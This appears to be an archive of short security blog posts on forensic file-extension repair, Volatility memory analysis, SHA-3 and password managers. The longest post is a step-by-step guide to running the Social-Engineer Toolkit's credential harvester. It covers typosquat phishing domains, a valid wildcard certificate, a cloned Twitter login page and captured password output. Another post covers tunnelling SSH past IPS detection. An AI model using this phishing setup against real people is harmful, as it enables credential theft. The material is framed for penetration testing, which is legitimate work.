-
real-extension.py corrects missing or incorrect file extensions

Sometimes when we are carving files out of a harddrive image or pulling them out of a network trace the extensions get messed up or stripped completely.
I wrote this python script to correct wrong or missing extensions. It uses libmagic to identify the mime type of a file and checks apache’s mime.types file to verify that the extension matches that type. If there is no extension, or the extension is incorrect, the script will change it.
The script is real-extension.py:
https://dl.dropboxusercontent.com/u/11061846/real-extension.py
It ties into libmagic via the python-magic wrapper:
https://github.com/ahupp/python-magic
You will also need the apache mime.types file:
http://svn.apache.org/viewvc/httpd/httpd/branches/2.2.x/docs/conf/mime.types?revision=1301896&view=co
Usage: real-extension.py /path/to/files/ /path/to/mime.types
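The following is an added example of the same idea, not the real-extension.py script itself: a mime.types parser, a type sniffer, and the rename decision. It uses the python-magic wrapper when it is installed and otherwise falls back to a small hypothetical signature table; the mime.types excerpt is constructed in the layout of Apache’s file.

```python
import os

try:
    import magic  # python-magic wrapper around libmagic, as the original script uses
except ImportError:  # fall back to the built-in signature table below
    magic = None

# Constructed excerpt in the layout of Apache's mime.types ("type/subtype  ext1 ext2 ...").
MIME_TYPES_SAMPLE = """\
# MIME type                     Extensions
application/pdf                 pdf
application/zip                 zip
image/jpeg                      jpeg jpg jpe
image/png                       png
text/plain                      txt text
"""

# Hypothetical stand-in for libmagic: leading byte signatures of a few common types.
SIGNATURES = [
    (b"%PDF-", "application/pdf"),
    (b"PK\x03\x04", "application/zip"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
]


def parse_mime_types(text):
    """Map each MIME type to its valid extensions (lower-cased). '#' comments
    and types listed without any extension, common in the real file, are skipped."""
    table = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) >= 2:
            table[parts[0]] = [e.lower() for e in parts[1:]]
    return table


def sniff_mime(head):
    """Return the MIME type for the first bytes of a file, or None if unknown."""
    for sig, mime in SIGNATURES:
        if head.startswith(sig):
            return mime
    return None


def identify(path):
    """Use libmagic when python-magic is installed, else the signature table."""
    if magic is not None:
        return magic.from_file(path, mime=True)
    with open(path, "rb") as fh:
        return sniff_mime(fh.read(16))


def corrected_name(filename, mime, table):
    """Name the file should carry: unchanged when its extension is already valid
    for `mime` (or the type is unknown), otherwise the first listed extension."""
    exts = table.get(mime)
    if not exts:
        return filename
    stem, dot, ext = filename.rpartition(".")
    has_ext = bool(dot and stem)  # ".hidden" is a leading dot, not an extension
    if has_ext and ext.lower() in exts:
        return filename
    return f"{stem if has_ext else filename}.{exts[0]}"


def fix_directory(directory, table):
    """Rename mis-labelled files in `directory`; returns (old, new) pairs.
    Never overwrites an existing file, so collisions are left for a human."""
    renamed = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        new_name = corrected_name(name, identify(path), table)
        target = os.path.join(directory, new_name)
        if new_name != name and not os.path.exists(target):
            os.rename(path, target)
            renamed.append((name, new_name))
    return renamed
```

Run it as `fix_directory("/path/to/carved", parse_mime_types(open("mime.types").read()))`; files whose type libmagic cannot place in the table are left untouched rather than guessed.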
-
Tip for tunneling SSH over tcp/443
Here’s a great tip from Greg Chetrick.
Tunneling SSH over tcp/443 is a common trick. Most firewalls allow tcp/443 outbound, however some IPS and proxy devices are able to detect that the traffic on 443 is SSH rather than SSL. This gives them the ability to drop the traffic and kill your tunnel.
Greg’s idea is to tunnel SSH over SSL using Stunnel. Simple. Easy. Quite nice.
-
Video of Memory Analysis Talk
My talk at DC404 on Memory Analysis with Volatility. Keep in mind that DC404 is held in the back room of Manuel’s Tavern in Atlanta, so please expect waitstaff, drinking and eating along with the security. Thanks Taylor!
-
Memory Analysis with Volatility
I gave a short presentation yesterday on basic memory analysis using the Volatility framework at the monthly DC404 meeting.
The memory sample we used can be downloaded from the amazing Honeynet Project. You can get a copy of the memory sample here. WARNING: It will (should) trigger your AV as there is malware embedded in the memory sample. However there is little risk of infecting yourself as you’d have to extract and then execute the malware.
I used volatility 2.3-alpha for the presentation. You can download it via svn checkout using the following:
svn checkout http://volatility.googlecode.com/svn/trunk/ volatility-dc404
For some of the plugins you will also need Distorm (disassembly library), Yara (malware scanner), Pycrypto (crypto library), and PIL (Python Imaging Library).
Here is the presentation slide deck
And here is the presentation worksheet
Finally, the volatility crew published a useful cheat sheet that you can download from here.
-
Automater.py for IP/URL reputation analysis
Automater.py is a cool little python script that will check on IP / URL reputation. It will take an IP or hostname either individually or as a list. It then checks it against various reputation sites like ipvoid.com. It will also expand short URLs like the ones that come in spam and tweets.
-
Tip for using Password Managers
Are you using a password manager like KeePass or LastPass? The benefit of these managers is that you don’t need to remember your passwords directly. This gives you the ability to maintain longer, stronger passwords that can be changed more frequently. Of course the risk is that the main password you use for the password management tool is now the keystone for all of your authentication. If that one master password is guessed or cracked, all of your passwords are cracked.
To help minimize that risk pick a short string that is part of each password but left out of the password manager. The string is added back to the password during the authentication process.
For instance you might pick the string “H8r!” which will be inserted at the third position of every password. When you copy/paste or autofill a password from the password manager, just put your cursor at the third position and re-add the string.
Now if your password manager does get breached there is still one more stumbling block before those passwords are useful.
-
Configuring the Social-Engineer Toolkit (SET) to use valid SSL certificates
The Social-Engineer Toolkit, commonly known as SET, was created by Dave Kennedy. It is a python based framework for a variety of tools centered around social engineering attacks.
A common SET technique is to use it to clone a website to socially engineer a user into installing malware or to grab their credentials. These client side attacks rely on enticing the target to click on a link.
These types of attacks can often build a better trust relationship with the target by adding in SSL and using https rather than straight http to perform the attack.
Setting this up with SET is not the most intuitive thing, but is actually quite easy to do.
-=-=-=-=-=-=-=-=-=-=-=-
1) Register a domain name for social engineering
The first step is to register a domain name for use with a social engineering attack. The first method is to pick one specific to each job. For instance if we were hired to target company.com we might pick pany.com so we could create the domain com.pany.com. We might also pick a “typo squat” copy like conpany.com or add on to the existing domain like company-llc.com.
The other method is to register a flexible domain name that can be used in multiple situations. For instance we will be using account-verify.com. This will allow us to create domains like facebook.account-verify.com or google.account-verify.com.
-=-=-=-=-=-=-=-=-=-=-=-
2) Pick a CA for your SSL certificate
After you register the domain name, you need to pick a Certificate Authority (CA) to sign your SSL certificate. The CA is the root of trust (insomuch as they can be trusted.) They sign your certificate to say it is valid. Of course they charge for this.
Common CAs include Comodo, Trustwave, Entrust, Thawte and lots of resellers that can cut you a good deal. SSL shopper does a pretty good job of tracking deals on certificate signing.
For our domain, account-verify.com, we will register for a wildcard certificate. A wildcard certificate lets us get one certificate for *.account-verify.com which will be valid for any host directly under account-verify.com.
With a wildcard certificate we can create valid links for domains like:
https://twitter.account-verify.com or
https://linkedin.account-verify.com
It’s more expensive than a certificate for a single host but can be very useful. NOTE: a wildcard certificate only matches a single label to the left of the registered domain. In other words:
https://twitter.account-verify.com will work, but
https://www.twitter.account-verify.com will give a domain name mismatch.
If you are planning on a single use domain like company-llc.com it is much cheaper to register for a certificate for a single host like www.company-llc.com
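To make the one-label wildcard rule above concrete, here is an added example (not from the original post) of the matching logic a browser applies when it compares a certificate name against the host in the URL. The names it is exercised with are the post’s own; the function and its strict handling of partial-label wildcards are this example’s assumptions.

```python
def hostname_matches(pattern, hostname):
    """RFC 6125-style check: '*' may only be the whole leftmost label and it
    covers exactly one non-empty label, so '*.example.com' never matches
    'example.com' or 'a.b.example.com'. Comparison is case-insensitive.
    Partial-label wildcards such as 'tw*.example.com' are treated as no match,
    which is stricter than some clients but safe."""
    p = pattern.lower().rstrip(".").split(".")
    h = hostname.lower().rstrip(".").split(".")
    if len(p) != len(h):  # a wildcard cannot absorb extra labels
        return False
    if p[0] == "*":
        return h[0] != "" and h[1:] == p[1:]
    return p == h


def cert_covers(cert_names, hostname):
    """True if any subject / subjectAltName entry on the cert matches hostname."""
    return any(hostname_matches(name, hostname) for name in cert_names)


if __name__ == "__main__":
    for host in ("twitter.account-verify.com", "www.twitter.account-verify.com",
                 "account-verify.com"):
        print(host, cert_covers(["*.account-verify.com"], host))
```

The second and third hosts are exactly the “domain name mismatch” cases: the browser shows a warning for them even though the wildcard certificate is otherwise valid.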
-=-=-=-=-=-=-=-=-=-=-=-
3) Generate your SSL key pair
After we decide on a CA we will need to generate a public/private key pair using openssl. We will use our public key as a certificate signing request or CSR.
We will need openssl to use the following command (all on one line, wrapped for readability):
$ openssl req -nodes -newkey rsa:2048 -keyout STAR_account-verify_com.key -out STAR_account-verify_com.csr
While running the command, openssl will ask for specific information:
Country Name (2 letter code) [AU]: US
State or Province Name (full name) [Some-State]: New York
Locality Name (eg, city) []: NYC
Organization Name (eg, company) [Internet Widgits Pty Ltd]: FakeCo, Ltd
Organizational Unit Name (eg, section) []:
Common Name (eg, YOUR name) []: *.account-verify.com
Email Address []:
The most important field is the “common name” which is the domain name we are signing. Since we are registering a wildcard domain we will use the format of *.account-verify.com, otherwise you should specify the exact domain like www.company-llc.com.
The result of this command will be two files: your private key and your certificate signing request (which carries the public key).
STAR_account-verify_com.key : private key
STAR_account-verify_com.csr : public key/CSR
-=-=-=-=-=-=-=-=-=-=-=-
3) Submit your CSR
After generating your private and public key pair you will apply for your signed SSL certificate. Some CAs will require extensive documentation to prove who you are and that you own the domain. Usually you only need to receive an email at the domain in question. So we need to make sure we can receive email at an address like admin@account-verify.com
We will need to upload our public key/csr, STAR_account-verify_com.csr, to the CA for signing.
After the certificate is signed (and paid for) you will receive an email with the signed and signing certificates. This is typically two or three files. You will definitely receive the signed certificate for your domain as well as the CA certificate used to sign it.
Sometimes the CA will not sign the certificate directly, but use chained, intermediate certificates instead. The CA signs an intermediate certificate which is then used to sign your actual certificate.
Your CA will typically return something like this:
TrustedCARoot.crt : CA certificate
IntermediateCA.crt : Optional Intermediate CA cert
STAR_account-verify_com.crt : Signed cert
-=-=-=-=-=-=-=-=-=-=-=-
CRT, CER, PEM, KEY, DER?
Depending on which CA you decide on you may get different files types back. The file extension you will usually get is one of the following: crt, cer, key, pem, or der.
In reality the extension doesn’t matter. There are actually only two different encodings: PEM and DER. We are looking for PEM. PEM is plaintext (really ASCII Base64 encoded) and will start with “—– BEGIN …”. DER is a binary format.
You can use the following command to convert a DER certificate to PEM format:
$ openssl x509 -inform der -in certificate.der -out certificate.pem
To be compatible with SET we will need to rename our certificates so that they have the .pem extension.
$ mv STAR_account-verify_com.key STAR_account-verify_com-key.pem
$ mv STAR_account-verify_com.crt STAR_account-verify_com.pem
Copy your private key, STAR_account-verify_com-key.pem, and signed certificate, STAR_account-verify_com.pem, to your SET server.
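Because the extension tells you nothing, it helps to check the bytes before renaming. The following is an added example, not part of the original post: it classifies a file as PEM or DER by content, converts between the two encodings, and normalises whatever the CA returned to PEM. The sample DER blob is a constructed two-byte ASN.1 SEQUENCE, not a real certificate, so the conversion can be checked without a CA.

```python
import base64
import re

# One PEM block: a label line, base64 body, matching END line.
PEM_BLOCK = re.compile(rb"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S)

# Constructed sample: DER for SEQUENCE { INTEGER 5 }. Not a certificate, just valid DER.
SAMPLE_DER = b"\x30\x03\x02\x01\x05"


def detect_encoding(data):
    """'PEM' if the file starts with a BEGIN line, 'DER' if it starts with the
    ASN.1 SEQUENCE tag that every X.509 certificate and PKCS key begins with."""
    if data.lstrip().startswith(b"-----BEGIN "):
        return "PEM"
    if data[:1] == b"\x30":
        return "DER"
    return "unknown"


def der_to_pem(der, label="CERTIFICATE"):
    """Base64 the DER bytes in 64-column lines between BEGIN/END markers."""
    b64 = base64.b64encode(der)
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    lab = label.encode()
    return (b"-----BEGIN " + lab + b"-----\n" + b"\n".join(lines)
            + b"\n-----END " + lab + b"-----\n")


def pem_to_der(pem):
    """Decode the first PEM block in the data back to DER."""
    match = PEM_BLOCK.search(pem)
    if not match:
        raise ValueError("no PEM block found")
    return base64.b64decode(b"".join(match.group(2).split()))


def pem_label(pem):
    """The BEGIN label, e.g. 'CERTIFICATE' or 'RSA PRIVATE KEY'."""
    match = PEM_BLOCK.search(pem)
    return match.group(1).decode() if match else None


def normalize_to_pem(data, label="CERTIFICATE"):
    """Return PEM bytes regardless of which encoding the CA shipped."""
    encoding = detect_encoding(data)
    if encoding == "PEM":
        return data
    if encoding == "DER":
        return der_to_pem(data, label)
    raise ValueError("neither PEM nor DER")


def normalize_file(src, dst, label="CERTIFICATE"):
    """Read src in any encoding and write it to dst as PEM; returns the label used."""
    with open(src, "rb") as fh:
        pem = normalize_to_pem(fh.read(), label)
    with open(dst, "wb") as fh:
        fh.write(pem)
    return pem_label(pem)
```

For a real file, `normalize_file("STAR_account-verify_com.crt", "STAR_account-verify_com.pem")` does the same job as the openssl conversion plus the rename; the private key takes `label="RSA PRIVATE KEY"` or whatever label openssl wrote for it.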
-=-=-=-=-=-=-=-=-=-=-=-
4) Configure SET
To configure SET to use SSL we need to edit the config file. You will find it here:
set/config/set_config
In the config file you need to modify the following lines:
WEBATTACK_SSL=ON
SELF_SIGNED_CERT=OFF
PEM_CLIENT=/full/path/to/STAR_account-verify_com.pem # Your signed certificate
PEM_SERVER=/full/path/to/STAR_account-verify_com-key.pem # Your private key
-=-=-=-=-=-=-=-=-=-=-=-
5) Running SET
Now we can run SET.
$ ./set
From the main menu select:
1) Social-Engineering Attacks
Followed by:
2) Website Attack Vectors
And in our case we will run the userid/password stealing tool:
3) Credential Harvester Attack Method
We will use the “site cloning” option:
2) Site Cloner
And then follow the prompts. The first thing we need to provide is our domain for the POST action of the login form we will clone.
set:webattack> IP address for the POST back in Harvester/Tabnabbing: account-verify.com
Then we pick the login page we want to clone.
set:webattack> Enter the url to clone: https://twitter.com
And we let SET perform its web sucking magic.
[*] Cloning the website: https://twitter.com
[*] This could take a little bit...
It usually doesn’t take long and will announce when it’s ready.
The best way to use this attack is if username and password form fields are available. Regardless, this captures all POSTs on a website.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 443
[*] Information will be displayed to you as it arrives below:
Now we just need to send out some hooks and see if we can’t hook some phish.
After we hook a sucker, I mean a misguided user, via phishing or smishing or however we get them to connect to our site:
c-10-2-3-4.hsd1.ga.comcast.net - - [27/Nov/2012 22:42:49] "GET / HTTP/1.1" 200 -
----------------------------------------
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: session[username_or_email]= test@blah.com
POSSIBLE PASSWORD FIELD FOUND: session[password]= TestingHTTPSonSET
PARAM: return_to_ssl=true
POSSIBLE USERNAME FIELD FOUND: redirect_after_login=/
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
and there you go. Go use SET in all of its SSL splendor.
-=-=-=-=-=-=-=-=-=-=-=-
-
Designing a Security Department
Here is the presentation I gave today at the GA ISSA conference in Atlanta. Thanks for everyone that showed up so early.
https://docs.google.com/open?id=0B8P9Y_HwrsxnWEFNN25vNTd3V0U
-
Internet over SMS
In the case of your internet access failing you can still get and send short emails to family/friend, follow emergency posts on Facebook and post and follow any Twitter feed all via SMS.
-
SHA-3 announced
NIST has selected Keccak (pronounced “catch-ack”) as the newest hashing algorithm standard, SHA-3. Keccak is a “sponge” algorithm that “absorbs” data and “squeezes” out a hash anywhere from 224 through 512 bits in length. It also allows for prepending a key or salt to the input message prior to hashing. Everything from a “nutshell” description to the full standard can be found over on the authors’ website: http://keccak.noekeon.org/
There is the question as to whether SHA-3 is even necessary. The SHA-2 family includes 224, 256, 384 and 512 bit digests (SHA-224 through SHA-512) and has held up extremely well despite some security scares along the way. SHA-512 looks solid for the foreseeable future.
Still, Keccak provides a safety net in case vulnerabilities are found in SHA-2. It also sounds as if Keccak’s flexible and compact design gives it better resource utilization. Regardless, as a crypto-geek these NIST contests fascinate me.
You can download the KeccakTools (even a Python port) over here.
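As an added example (not from the post or from the Keccak authors), here is the sponge behaviour described above exercised with Python’s standard hashlib: the four fixed digest lengths, the extendable “squeeze” of SHAKE, and the prefix-key construction the post mentions. Note that hashlib’s sha3_* functions implement the final FIPS 202 standard, whose padding differs from the competition-era submission, so their outputs do not match the original KeccakTools digests. The message and keys are constructed sample inputs.

```python
import hashlib

MESSAGE = b"The quick brown fox jumps over the lazy dog"  # constructed sample input


def sha3_digests(msg):
    """Hex digests at all four fixed SHA-3 output sizes, keyed by bit length.
    Each is the same Keccak permutation with a different rate/capacity split."""
    return {bits: getattr(hashlib, f"sha3_{bits}")(msg).hexdigest()
            for bits in (224, 256, 384, 512)}


def sha2_digests(msg):
    """The SHA-2 counterparts at the same sizes, for side-by-side comparison."""
    return {bits: getattr(hashlib, f"sha{bits}")(msg).hexdigest()
            for bits in (224, 256, 384, 512)}


def shake_digest(msg, out_bytes):
    """SHAKE128: the sponge's extendable-output mode; squeeze as many bytes as wanted."""
    return hashlib.shake_128(msg).hexdigest(out_bytes)


def keyed_sha3_256(key, msg):
    """hash(key || message): the prepend-a-key construction from the post.
    A sponge keeps part of its state (the capacity) hidden from the output, so the
    digest does not reveal enough to extend the message. SHA-2 outputs its full
    internal state, so the same layout there is subject to length extension and
    HMAC is used instead."""
    return hashlib.sha3_256(key + msg).hexdigest()


def hmac_sha256(key, msg):
    """Reference MAC for SHA-2 when the same keyed use is wanted there."""
    import hmac
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


if __name__ == "__main__":
    for bits, hexd in sha3_digests(MESSAGE).items():
        print(f"SHA3-{bits}: {hexd}")
    print("SHAKE128 (20 bytes):", shake_digest(MESSAGE, 20))
    print("keyed SHA3-256:", keyed_sha3_256(b"constructed-key", MESSAGE))
```

A useful check when comparing implementations is the empty-message digest: SHA3-256 of zero bytes is a7ffc6f8bf1ed76651c14756a061d662f580ff4de43b49fa82d80a4b80f8434a under FIPS 202.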
